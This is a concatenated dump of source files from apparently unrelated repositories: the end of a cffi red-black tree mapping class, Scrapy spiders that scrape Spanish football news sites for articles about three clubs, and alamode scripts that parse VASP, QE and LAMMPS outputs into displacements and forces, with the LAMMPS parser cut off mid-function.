self._handles.add(item_p)
if not lib.rb_tree_insert(self._rbtree, item_p):
raise RuntimeError(
"Unexpected error inserting key {!r}".format(key))
def __getitem__(self, key):
found, item = self._get(key)
if found:
return item
raise KeyError(key)
def __delitem__(self, key):
if key not in self:
raise KeyError(key)
item = Item(key, None)
item_p = ffi.new_handle(item)
removed = lib.rb_tree_remove_with_cb(
self._rbtree, item_p, lib.rb_tree_node_was_removed)
if not removed:
raise RuntimeError(
"Unexpected error removing key {!r}".format(key))
def __iter__(self):
for key, _ in self._iter():
yield key
def __eq__(self, other):
return len(self) == len(other) and sorted_mapping_eq(self, other)
def keys(self):
for key, _ in self.items():
yield key
def values(self):
for _, value in self.items():
yield value
def _iter(self):
rb_iter = lib.rb_iter_create()
try:
item_p = lib.rb_iter_first(rb_iter, self._rbtree)
while item_p != ffi.NULL:
item = ffi.from_handle(item_p)
yield (item.key, item.value)
item_p = lib.rb_iter_next(rb_iter)
finally:
lib.rb_iter_dealloc(rb_iter)
def items(self):
return self._iter()
def __repr__(self) -> str:
st = '{'
for key, value in self.items():
st += f"'{key}': {value}, "
st = st.strip(', ') + '}'
return st
@ffi.def_extern()
def rb_tree_node_compare(rb_tree_p, rb_node_a, rb_node_b):
a, b = ffi.from_handle(rb_node_a.value), ffi.from_handle(rb_node_b.value)
if a.key == b.key:
return 0
if a.key < b.key:
return -1
return 1
@ffi.def_extern()
def rb_tree_node_was_removed(rb_tree_p, rb_node_p):
ffi.from_handle(rb_tree_p.info)._handles.discard(rb_node_p.value)
lib.rb_tree_node_dealloc_cb(rb_tree_p, rb_node_p)
def sorted_mapping_eq(map1, map2):
return all(
k1 == k2 and v1 == v2
for (k1, v1), (k2, v2)
in zip(map1.items(), map2.items()))
``` |
{
"source": "jochoaserna/footballnews",
"score": 3
} |
#### File: scrapy_tfg/spiders/footballnews_spider.py
```python
import scrapy
import re
import json
import urllib.parse
import datetime
import random
class MarcaSpider(scrapy.Spider):
name = "footballnews"
start_urls = [
'http://www.marca.com/futbol/atletico.html',
'http://www.marca.com/futbol/real-madrid.html',
'http://www.marca.com/futbol/barcelona.html',
'http://as.com/tag/atletico_madrid/',
'http://as.com/tag/fc_barcelona/',
'http://as.com/tag/real_madrid/',
'http://www.mundodeportivo.com/futbol/atletico-madrid',
'http://www.mundodeportivo.com/futbol/real-madrid',
'http://www.mundodeportivo.com/futbol/fc-barcelona',
'http://www.sport.es/es/barca/',
'http://www.sport.es/es/real-madrid/'
]
# -------------------------------------------------------------
# NUEVAS ORDENES
# $ scrapy crawl footballnews -o footballnews.json
# -------------------------------------------------------------
#COMENTAR!
# def __init__(self, team='atletico'):
# self.start_urls = ['http://www.marca.com/futbol/%s.html' % team]
#COMENTAR!
def parse(self, response):
# follow links to each news item
if bool(re.search("marca.com", response.url)):
for href in response.css('h3.mod-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_marca)
elif bool(re.search("as.com", response.url)):
for href in response.css('h2.title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_as)
elif bool(re.search("mundodeportivo.com/", response.url)):
for href in response.css('h3.story-header-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_md)
elif bool(re.search("sport.es", response.url)):
for href in response.css('section.blockpad[data-section="layout-1"] h2.title a::attr(href) ,section.blockpad[data-section="layout-2"] h2.title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_sport)
def parse_news_marca(self, response):
headline = response.css('h1.js-headline.izquierda::text')[0].extract()
#if len(''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract())) < 3896:
#if ''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract()) != "":
articleBody = ''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract())
#author = response.css('ul.author strong::text')[0].extract()
articleSection = response.css('span.section-type::text')[0].extract()
commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.row.content.cols-30-70 time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.row.content.cols-30-70 figure img::attr(src)').extract()
videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
keywords = response.css('ul.item-tags a::text').extract()
comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.date::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("atletico", url)):
team = "atletico"
elif bool(re.search("real-madrid", url)):
team = "madrid"
elif bool(re.search("barcelona", url)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
'comments':comments,
'dateCreated':dateCreated,
'newspaper': "marca",
'url': url,
'team': team,
'id':_id
}
yield item
return
def parse_news_as(self, response):
headline = response.css('h1.titular-articulo::text')[0].extract()
#if len(''.join(response.css('div.int-articulo p:not(.txt-art-tags):not(.tit-detalle):not(.fecha-detalle)::text, div.int-articulo p a em::text, div.int-articulo p strong a::text, div.int-articulo p a::text, div.int-articulo p strong::text, div.int-articulo p span::text').extract())) < 3896:
articleBody = ''.join(response.css('div.int-articulo p:not(.txt-art-tags):not(.tit-detalle):not(.fecha-detalle)::text, div.int-articulo p a em::text, div.int-articulo p strong a::text, div.int-articulo p a::text, div.int-articulo p strong::text, div.int-articulo p span::text').extract())
##author = response.css('a.author-pic span::text')[0].extract()
articleSection = response.css('p.subtit-art a::text')[0].extract()
commentCount = response.css('div.contador span::text')[0].extract() #DUDA
datePublished = response.css('div.art-info time::attr(datetime)')[0].extract()
images = response.css('div.cont-img-dest-art img::attr(src), div.int-articulo p+figure img::attr(src)').extract()
#videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
keywords = response.css('div.cont-art-tags li a::text').extract()
#comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("ATLÉTICO", articleSection)):
team = "atletico"
elif bool(re.search("REAL MADRID", articleSection)):
team = "madrid"
elif bool(re.search("BARCELONA", articleSection)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
#'videos':videos,
'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "as",
'url': url,
'team': team,
'id':_id
}
yield item
return
def parse_news_md(self, response):
headline = response.css('h1.story-leaf-title::text')[0].extract()
articleBody = ''.join(response.css('div.story-leaf-txt-p p::text ,div.story-leaf-txt-p p b::text ,div.story-leaf-txt-p p a::text').extract())
#author = response.css('div.story-leaf-author-text span::text')[0].extract()
#articleSection = response.css('span.section-type::text')[0].extract()
#commentCount = response.css('div.fyre-comment-count span::text')[0].extract()
datePublished = response.css('div.story-leaf-body.story-leaf-indent time::attr(datetime)')[0].extract()
images = response.css('div.container figure img::attr(src)')[1].extract()
videos = response.css('div.html-box-center iframe::attr(src)').extract()
keywords = response.css('li.story-leaf-topics-item a::text').extract()
#comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("atletico-madrid", url)):
team = "atletico"
elif bool(re.search("real-madrid", url)):
team = "madrid"
elif bool(re.search("fc-barcelona", url)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
#'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "md",
'url': url,
'team': team,
'id':_id
}
yield item
return
def parse_news_sport(self, response):
headline = response.css('header.head h1::text')[0].extract()
articleBody = ''.join(response.css('div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p a::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p strong::text').extract())
#author = response.css('div.author div.txt p::text , div.author div.txt a.author-link::text')[0].extract()
articleSection = response.css('p.breadcrumb a::text')[0].extract()
# commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.author time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.middle figure img::attr(src)')[0].extract()
# videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
# keywords = response.css('ul.item-tags a::text').extract()
# comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("barca", url)):
team = "barca"
elif bool(re.search("real-madrid", url)):
team = "madrid"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
#'videos':videos,
#'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "sport",
'url': url,
'team': team,
'id':_id
}
yield item
return
```
#### File: scrapy_tfg/spiders/marca_spider.py
```python
import scrapy
import re
import datetime
import random
class MarcaSpider(scrapy.Spider):
name = "marca"
start_urls = [
'http://www.marca.com/futbol/atletico.html',
'http://www.marca.com/futbol/real-madrid.html',
'http://www.marca.com/futbol/barcelona.html'
]
team = ""
teamsURL = ['atletico','real-madrid', 'barcelona']
teamsParse = ['atletico','madrid', 'barca']
# -------------------------------------------------------------
# ORDENES
# $ scrapy crawl marca -o marca.json
# -------------------------------------------------------------
def parse(self, response):
# follow links to each news item
for href in response.css('h3.mod-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news)
def parse_news(self, response):
headline = response.css('h1.js-headline.izquierda::text')[0].extract()
articleBody = ''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract())
articleSection = response.css('span.section-type::text')[0].extract()
commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.row.content.cols-30-70 time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.row.content.cols-30-70 figure img::attr(src)').extract()
videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
keywords = response.css('ul.item-tags a::text').extract()
comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.date::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
self.team = ""
for indexURL, elemURL in enumerate(self.teamsURL):
if bool(re.search(elemURL, url)):
self.team = self.teamsParse[indexURL]
if self.team == "":
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
'articleSection':articleSection,
'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
'comments':comments,
'dateCreated':dateCreated,
'newspaper': "marca",
'url': url,
'team': self.team,
'id':_id
}
yield item
return
```
#### File: scrapy_tfg/spiders/mdeportivo_spider.py
```python
import scrapy
import re
import json
import urllib.parse
import datetime
import random
class MundodeportivoSpider(scrapy.Spider):
name = "md"
start_urls = [
'http://www.mundodeportivo.com/futbol/atletico-madrid',
'http://www.mundodeportivo.com/futbol/real-madrid',
'http://www.mundodeportivo.com/futbol/fc-barcelona'
]
# -------------------------------------------------------------
# ORDENES
# $ scrapy crawl md -a team=atletico-madrid -o md-atm.json
# $ scrapy crawl md -a team=real-madrid -o md-rma.json
# $ scrapy crawl md -a team=fc-barcelona -o md-bar.json
# -------------------------------------------------------------
# def __init__(self, team='atletico_madrid'):
# self.start_urls = ['http://www.mundodeportivo.com/futbol/%s' % team]
def parse(self, response):
# follow links to each news item
for href in response.css('h3.story-header-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news)
def parse_news(self, response):
headline = response.css('h1.story-leaf-title::text')[0].extract()
articleBody = ''.join(response.css('div.story-leaf-txt-p p::text ,div.story-leaf-txt-p p b::text ,div.story-leaf-txt-p p a::text').extract())
#author = response.css('div.story-leaf-author-text span::text')[0].extract()
#articleSection = response.css('span.section-type::text')[0].extract()
#commentCount = response.css('div.fyre-comment-count span::text')[0].extract()
datePublished = response.css('div.story-leaf-body.story-leaf-indent time::attr(datetime)')[0].extract()
images = response.css('div.container figure img::attr(src)')[1].extract()
videos = response.css('div.html-box-center iframe::attr(src)').extract()
keywords = response.css('li.story-leaf-topics-item a::text').extract()
#comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("atletico-madrid", url)):
team = "atletico"
elif bool(re.search("real-madrid", url)):
team = "madrid"
elif bool(re.search("fc-barcelona", url)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
#'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "md",
'url': url,
'team': team,
'id':_id
}
yield item
return
```
#### File: scrapy_tfg/spiders/sport_spider.py
```python
import scrapy
import re
import json
import urllib.parse
import datetime
import random
class SportSpider(scrapy.Spider):
name = "sport"
start_urls = [
'http://www.sport.es/es/barca/',
'http://www.sport.es/es/real-madrid/'
]
# -------------------------------------------------------------
# ORDENES
# $ scrapy crawl sport -a team=real-madrid -o sport-rma.json
# $ scrapy crawl sport -a team=barca -o sport-bar.json
# -------------------------------------------------------------
# def __init__(self, team='barca'):
# self.start_urls = ['http://www.sport.es/es/%s/' % team]
def parse(self, response):
# follow links to each news item
for href in response.css('h2.title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news)
def parse_news(self, response):
headline = response.css('header.head h1::text')[0].extract()
articleBody = ''.join(response.css('div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p a::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p strong::text').extract())
#author = response.css('div.author div.txt p::text , div.author div.txt a.author-link::text')[0].extract()
articleSection = response.css('p.breadcrumb a::text')[0].extract()
# commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.author time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.middle figure img::attr(src)')[0].extract()
# videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
# keywords = response.css('ul.item-tags a::text').extract()
# comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("barca", url)):
team = "barca"
elif bool(re.search("real-madrid", url)):
team = "madrid"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
#'videos':videos,
#'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "sport",
'url': url,
'team': team,
'id':_id
}
yield item
return
``` |
{
"source": "jochym/alamode",
"score": 2
} |
#### File: alamode/tools/extract.py
```python
from __future__ import print_function
import argparse
from interface.VASP import VaspParser
from interface.QE import QEParser
from interface.xTAPP import XtappParser
from interface.OpenMX import OpenmxParser
from interface.LAMMPS import LammpsParser
parser = argparse.ArgumentParser()
parser.add_argument('--VASP',
metavar='SPOSCAR',
help="VASP POSCAR file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--QE',
metavar='supercell.pw.in',
help="Quantum-ESPRESSO input file with equilibrium\
atomic positions (default: None)")
parser.add_argument('--xTAPP',
metavar='supercell.cg',
help="xTAPP CG file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--LAMMPS',
metavar='supercell.lammps',
help="LAMMPS structure file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--OpenMX',
metavar='supercell.dat',
help="OpenMX dat file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--get',
default="disp-force",
help="specify which quantity to extract. \
Available options are 'disp-force', 'disp', \
'force', 'energy', and 'born'. \
(default: disp-force)")
parser.add_argument('--unit',
action="store",
metavar="OUTPUT_UNIT",
dest="unitname",
default="Rydberg",
help="print atomic displacements and forces in units of UNIT. \
Available options are 'eV', 'Rydberg' (default), and 'Hartree'.")
parser.add_argument('--offset',
help="Specify an output file (either *.xml, *.pw.out, or *.str) of an\
equilibrium structure to subtract residual forces, \
displacements, or energies.")
parser.add_argument('--emin',
default=None,
type=float,
help="Lower bound of the energy filter (eV) used for selecting output structures.\
Available only in the VASP parser.")
parser.add_argument('--emax',
default=None,
type=float,
help="Upper bound of the energy filter (eV) used for selecting output structures.\
Available only in the VASP parser.")
parser.add_argument('target_file', metavar='file_to_parse', type=str, nargs='+',
help="Output file of DFT codes, e.g., vasprun.xml.")
def check_options(args):
# Check the calculator option
conditions = [args.VASP is None,
args.QE is None,
args.xTAPP is None,
args.LAMMPS is None,
args.OpenMX is None]
if conditions.count(True) == len(conditions):
raise RuntimeError(
"Either --VASP, --QE, --xTAPP, --LAMMPS, \
--OpenMX option must be given.")
elif len(conditions) - conditions.count(True) > 1:
raise RuntimeError("Error : --VASP, --QE, --xTAPP, --LAMMPS, and \
--OpenMX cannot be given simultaneously.")
elif args.VASP:
code = "VASP"
file_original = args.VASP
elif args.QE:
code = "QE"
file_original = args.QE
elif args.xTAPP:
code = "xTAPP"
file_original = args.xTAPP
elif args.LAMMPS:
code = "LAMMPS"
file_original = args.LAMMPS
elif args.OpenMX:
code = "OpenMX"
file_original = args.OpenMX
# Check output option
str_get = args.get.lower()
if str_get not in ["disp-force", "disp", "force", "energy", "born", "dielec"]:
raise RuntimeError("Error: Please specify which quantity to extract by the --get option.")
print_disp = False
print_force = False
print_energy = False
print_borninfo = False
if str_get == "disp-force":
print_disp = True
print_force = True
elif str_get == "disp":
print_disp = True
elif str_get == "force":
print_force = True
elif str_get == "energy":
print_energy = True
elif str_get == "born" or str_get == "dielec":
print_borninfo = True
if code != "VASP" and code != "QE":
raise RuntimeError("Sorry, --get born is available only for VASP and QE.")
output_flags = [print_disp, print_force, print_energy, print_borninfo]
# Check unit option
str_unit = args.unitname.lower()
if str_unit in ["ev", "electron_volt"]:
str_unit = "ev"
elif str_unit in ["ry", "ryd", "rydberg"]:
str_unit = "rydberg"
elif str_unit in ["ha", "hartree"]:
str_unit = "hartree"
else:
print("Error: Invalid unit name : %s" % args.unitname)
return code, file_original, output_flags, str_unit
def run_parse(args, code, file_original, file_results, output_flags, str_unit):
# Print data
if code == "VASP":
handler = VaspParser()
elif code == "QE":
handler = QEParser()
elif code == "xTAPP":
handler = XtappParser()
elif code == "OpenMX":
handler = OpenmxParser()
elif code == "LAMMPS":
handler = LammpsParser()
handler.parse(file_original, file_results, args.offset,
str_unit, output_flags, args.emin, args.emax)
if __name__ == "__main__":
args = parser.parse_args()
file_results = args.target_file
code, file_original, output_flags, str_unit = check_options(args)
run_parse(args, code, file_original, file_results, output_flags, str_unit)
```
#### File: tools/interface/LAMMPS.py
```python
import numpy as np
import math
class LammpsParser(object):
def __init__(self):
self._prefix = None
self._lattice_vector = None
self._inverse_lattice_vector = None
self._kd = None
self._charges = None
self._common_settings = None
self._nat = 0
self._x_cartesian = None
self._x_fractional = None
self._counter = 1
self._nzerofills = 0
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
self._force_conversion_factor = 1.0
self._initial_structure_loaded = False
self._print_disp = True
self._print_force = True
self._print_energy = False
self._print_born = False
self._BOHR_TO_ANGSTROM = 0.5291772108
self._RYDBERG_TO_EV = 13.60569253
def load_initial_structure(self, file_in):
lammps_box_params = {}
f = open(file_in, 'r')
f.readline()
common_settings = []
for line in f:
if "Atoms" in line:
break
split_line = line.strip().split()
if len(split_line) % 2 == 0:
for i in range(len(split_line) // 2):
lammps_box_params[split_line[i + len(split_line) // 2]] = float(split_line[i])
common_settings.append(line.rstrip())
atoms = []
for line in f:
if line.strip():
atoms.append(line.rstrip().split())
atoms = np.array(atoms)
nat = len(atoms)
ncols = len(atoms[0, :])
if ncols == 5:
kd = np.array(atoms[:, 1], dtype=np.int)
x = np.array(atoms[:, 2:5], dtype=np.float64)
charges = None
elif ncols == 6:
kd = np.array(atoms[:, 1], dtype=np.int)
x = np.array(atoms[:, 3:6], dtype=np.float64)
charges = np.array(atoms[:, 2], dtype=np.float64)
self._common_settings = common_settings
self._lattice_vector = self._compute_lattice_vector_from_boxparams(lammps_box_params)
self._inverse_lattice_vector = np.linalg.inv(self._lattice_vector)
self._nat = nat
self._x_cartesian = x
self._x_fractional = self._get_fractional_coordinate(x, self._inverse_lattice_vector)
self._kd = kd
self._charges = charges
self._initial_structure_loaded = True
def generate_structures(self, prefix, header_list, disp_list):
self._set_number_of_zerofill(len(disp_list))
self._prefix = prefix
for header, disp in zip(header_list, disp_list):
self._generate_input(header, disp)
def parse(self, initial_lammps, dump_files, dump_file_offset, str_unit,
output_flags, filter_emin=None, filter_emax=None):
if not self._initial_structure_loaded:
self.load_initial_structure(initial_lammps)
self._set_unit_conversion_factor(str_unit)
self._set_output_flags(output_flags)
if self._print_disp and self._print_force:
self._print_displacements_and_forces(dump_files,
dump_file_offset)
elif self._print_disp:
self._print_displacements(dump_files, dump_file_offset)
elif self._print_force:
self._print_atomicforces(dump_files, dump_file_offset)
def _generate_input(self, header, disp):
filename = self._prefix + str(self._counter).zfill(self._nzerofills) + ".lammps"
f = open(filename, 'w')
f.write("%s\n" % header)
for line in self._common_settings:
f.write("%s\n" % line)
f.write("%s\n\n" % "Atoms")
if self._charges is None:
for i in range(self._nat):
f.write("%5d %3d" % (i + 1, self._kd[i]))
disp_tmp = np.dot(disp[i], self._lattice_vector.transpose())
for j in range(3):
f.write("%20.15f" % (self._x_cartesian[i][j] + disp_tmp[j]))
f.write("\n")
f.write("\n")
else:
for i in range(self._nat):
f.write("%5d %3d %11.6f" % (i + 1, self._kd[i], self._charges[i]))
disp_tmp = np.dot(disp[i], self._lattice_vector.transpose())
for j in range(3):
f.write("%20.15f" % (self._x_cartesian[i][j] + disp_tmp[j]))
f.write("\n")
f.write("\n")
f.close()
self._counter += 1
def _print_displacements_and_forces(self, lammps_files, file_offset):
if file_offset is None:
disp_offset = np.zeros((self._nat, 3))
force_offset = np.zeros((self._nat, 3))
else:
x0_offset, force_offset = self._get_coordinate_and_force_lammps(file_offset)
try:
x0_offset = np.reshape(x0_offset, (self._nat, 3))
force_offset = np.reshape(force_offset, (self._nat, 3))
except:
raise RuntimeError("File %s contains too many/few entries" % file_offset)
disp_offset = x0_offset - self._x_cartesian
# Automatic detection of the input format
is_dumped_file = False
f = open(lammps_files[0], 'r')
for line in f:
if "ITEM: TIMESTEP" in line:
is_dumped_file = True
break
f.close()
if is_dumped_file:
# This version supports reading the data from MD trajectory
for search_target in lammps_files:
x, force = self._get_coordinate_and_force_lammps(search_target)
ndata = len(x) // (3 * self._nat)
x = np.reshape(x, (ndata, self._nat, 3))
force = np.reshape(force, (ndata, self._nat, 3))
for idata in range(ndata):
disp = x[idata, :, :] - self._x_cartesian - disp_offset
disp *= self._disp_conversion_factor
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d" %
(search_target, idata + 1))
for i in range(self._nat):
print("%20.14f %20.14f %20.14f %20.8E %15.8E %15.8E" % (disp[i, 0],
disp[i, 1],
disp[i, 2],
f[i, 0],
f[i, 1],
f[i, 2]))
else:
raise RuntimeError("Could not find ITEM: TIMESTEP keyword in the dump file %s" % lammps_files[0])
@staticmethod
def _compute_lattice_vector_from_boxparams(box_params):
xlo = box_params['xlo']
xhi = box_params['xhi']
ylo = box_params['ylo']
yhi = box_params['yhi']
zlo = box_params['zlo']
zhi = box_params['zhi']
if 'xy' in box_params.keys():
xy = box_params['xy']
if 'xz' in box_params.keys():
xz = box_params['xz']
if 'yz' in box_params.keys():
yz = box_params['yz']
lx = xhi - xlo
ly = yhi - ylo
lz = zhi - zlo
a = lx
b = math.sqrt(ly**2 + xy**2)
c = math.sqrt(lz**2 + xz**2 + yz**2)
cosalpha = (xy * xz + ly * yz) / (b * c)
cosbeta = xz / c
cosgamma = xy / b
singamma = math.sqrt(1.0 - cosgamma**2)
lavec = np.zeros((3, 3))
lavec[0, 0] = a
lavec[0, 1] = b * cosgamma
lavec[1, 1] = b * singamma
lavec[0, 2] = c * cosbeta
lavec[1, 2] = c * (cosalpha - cosbeta * cosgamma) / singamma
lavec[2, 2] = c * math.sqrt(1.0 - cosbeta**2 - ((cosalpha - cosbeta * cosgamma) / singamma)**2)
return lavec
@staticmethod
def _get_fractional_coordinate(xc, aa_inv):
if aa_inv is None:
return None
convmat = aa_inv.transpose()
nat, _ = np.shape(xc)
xf = np.zeros((nat, 3))
for i in range(nat):
xf[i] = np.dot(xc[i], convmat)
return xf
def _print_displacements(self, lammps_files, file_offset):
if file_offset is None:
disp_offset = np.zeros((self._nat, 3))
else:
x0_offset, _ = self._get_coordinate_and_force_lammps(file_offset)
nentries = len(x0_offset)
if nentries == 3 * self._nat:
x0_offset = np.reshape(x0_offset, (self._nat, 3))
else:
raise RuntimeError("File %s contains too many/few entries" % file_offset)
disp_offset = x0_offset - self._x_cartesian
# Automatic detection of the input format
is_dumped_file = False
f = open(lammps_files[0], 'r')
for line in f:
if "ITEM: TIMESTEP" in line:
is_dumped_file = True
break
f.close()
if is_dumped_file:
# This version supports reading the data from MD trajectory
for search_target in lammps_files:
x, _ = self._get_coordinate_and_force_lammps(search_target)
ndata = len(x) // (3 * self._nat)
x = np.reshape(x, (ndata, self._nat, 3))
for idata in range(ndata):
disp = x[idata, :, :] - self._x_cartesian - disp_offset
disp *= self._disp_conversion_factor
print("# Filename: %s, Snapshot: %d" %
(search_target, idata + 1))
for i in range(self._nat):
print("%20.14f %20.14f %20.14f" % (disp[i, 0],
disp[i, 1],
disp[i, 2]))
else:
raise RuntimeError("Could not find ITEM: TIMESTEP keyword in the dump file %s" % lammps_files[0])
def _print_atomicforces(self, lammps_files, file_offset):
if file_offset is None:
force_offset = np.zeros((self._nat, 3))
else:
_, force_offset = self._get_coordinate_and_force_lammps(file_offset)
try:
force_offset = np.reshape(force_offset, (self._nat, 3))
except:
raise RuntimeError("File %s contains too many position entries" % file_offset)
for search_target in lammps_files:
_, force = self._get_coordinate_and_force_lammps(search_target)
ndata = len(force) // (3 * self._nat)
force = np.reshape(force, (ndata, self._nat, 3))
for idata in range(ndata):
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d" %
(search_target, idata + 1))
for i in range(self._nat):
print("%19.11E %19.11E %19.11E" % (f[i][0], f[i][1], f[i][2]))
def _set_unit_conversion_factor(self, str_unit):
if str_unit == "ev":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
elif str_unit == "rydberg":
